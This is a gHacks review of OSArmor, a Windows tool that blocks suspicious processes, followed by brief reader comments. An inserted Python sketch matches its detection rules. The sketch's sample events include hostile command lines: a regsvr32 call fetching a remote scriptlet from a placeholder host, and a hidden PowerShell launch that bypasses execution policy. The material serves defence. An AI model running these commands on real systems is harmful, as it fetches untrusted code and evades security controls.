OSArmor monitors and blocks suspicious processes on Windows - gHacks Tech News

OSArmor is a new security program by NoVirusThanks for Microsoft Windows devices that monitors the system and blocks suspicious processes or actions.

The security program has basic anti-exploit protection built into it, but it is not comparable to Microsoft EMET or Malwarebytes Anti-Exploit, as its focus is on preventing certain processes from executing in the first place and on blocking certain activities.

A basic example is the blocking of processes that have double file extensions, such as sample.txt.exe, to hide their actual type from unsuspecting users.

OSArmor review

OSArmor is compatible with all recent versions of the Microsoft Windows operating system. The application needs to be installed before it can be used. The installer itself is clean, and the program is launched right after installation.

The interface is basic at this point in time. It displays session information about the number of blocked processes, the last blocked process, and the date and time that happened.

You cannot do much other than open the logs folder or the configuration. First-time users may want to open the configuration first, as it lists all the security features OSArmor supports.

Most protective options are enabled by default. The list is rather long; here is a short listing of interesting ones:

  • Block execution of pif, com and double file extensions.
  • Block USB spreading malware.
  • Prevent "important" system modifications via bcdedit.exe.
  • Block direct execution of scripts and exe files from archives.
  • Prevent regsvr32 from executing remote scripts and /i: parameter.
  • Block processes executed from wscript.exe, cscript.exe, mshta.exe and wmic.exe.
  • Block executionpolicy bypass and windowstyle hidden in PowerShell.
  • Block remote URL downloads from the command line.
  • Block direct execution of JavaScript and VBscript code.
  • Limit Windows Screensaver files to Windows folder.
  • Block execution of schtasks.exe.

The only options that are not enabled block the execution of unsigned processes from Local AppData, Roaming AppData, CommonAppdata, and Control Panel Applets.
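
The kind of file-name and command-line matching that several of the rules listed above imply, as an added Python sketch (not OSArmor's code and not from the article); the rule labels, extension sets and sample events are constructed assumptions. The `more.com` event shows how a blanket .com rule also catches a legitimate Windows tool, which is the false-positive case a whitelist would address.

```python
import ntpath
import re

# Rule names are hypothetical labels; extension sets are assumptions for this sketch.
DECOY_EXTS = {"txt", "pdf", "doc", "docx", "xls", "jpg", "png"}
EXEC_EXTS = {"exe", "scr", "bat", "cmd", "js", "vbs"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe"}
# PowerShell accepts abbreviated parameter names (-ex, -ep, -w), so match prefixes.
PS_BYPASS = re.compile(r"\s-(?:ex[a-z]*|ep)\s+bypass\b", re.I)
PS_HIDDEN = re.compile(r"\s-w[a-z]*\s+hidden\b", re.I)
REGSVR_REMOTE = re.compile(r"\s/i:|https?://", re.I)

def base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()

def check_event(parent, image, cmdline):
    """Return the rule labels matched by one process-creation event."""
    hits = []
    name = base(image)
    parts = name.split(".")
    if parts[-1] in {"pif", "com"}:
        hits.append("pif_com_extension")
    # Only flag a decoy document extension directly before an executable one.
    if len(parts) >= 3 and parts[-1] in EXEC_EXTS and parts[-2] in DECOY_EXTS:
        hits.append("double_extension")
    if base(parent) in SCRIPT_HOSTS:
        hits.append("child_of_script_host")
    if name == "powershell.exe":
        if PS_BYPASS.search(cmdline):
            hits.append("ps_executionpolicy_bypass")
        if PS_HIDDEN.search(cmdline):
            hits.append("ps_windowstyle_hidden")
    if name == "regsvr32.exe" and REGSVR_REMOTE.search(cmdline):
        hits.append("regsvr32_remote_or_i")
    return hits

# Constructed sample events: (parent image, child image, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Users\a\Downloads\sample.txt.exe", "sample.txt.exe"),
    (r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -ep Bypass -WindowStyle Hidden -File task.ps1"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
     "regsvr32.exe /s /i:http://example.invalid/placeholder placeholder.dll"),
    (r"C:\Windows\explorer.exe", r"C:\Users\a\Desktop\setup.v2.exe", "setup.v2.exe"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\more.com", "more.com"),
]

def scan(events):
    """Map each blocked child image name to the rules it triggered."""
    return {base(img): hits for par, img, cmd in events if (hits := check_event(par, img, cmd))}
```
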

The program comes without a help file, which makes it a tool for advanced users. It runs silently in the background for the most part and writes any processes that it blocks to daily log files.

The log files are a history of blocked processes, and they are the only option to troubleshoot issues. Logs list date, time and processes, as well as rules that blocked the process from execution.

One of the main shortcomings of OSArmor is that it comes without a whitelist. You can only disable a protective feature if you notice that legitimate processes are blocked by the application.

The program needs a whitelist direly, and an interface that lists all blocked processes directly so that you can whitelist certain blocked processes easily.

Closing Words

OSArmor 1.0 is a promising security program for Windows that blocks activity that is often abused by malware and other unwanted software. The lack of control over what gets blocked is the program's main weakness at this point.

An option to display a prompt (allow or deny execution, research online) would be useful, and a whitelist needs to be implemented as well so that false positives can be addressed without having to turn off a feature completely.

Comments

  1. NVT Fan said on December 19, 2017 at 8:44 pm

    No-Virus-Thanks has many good tools.

  2. KeZa said on December 21, 2017 at 4:18 pm

    Thnx

  3. rdsu said on December 25, 2017 at 3:20 pm

    Very good and promising…!!!

  4. bara said on December 31, 2017 at 11:10 pm

    OSArmor is the solution that will make up for the limits of antivirus software.
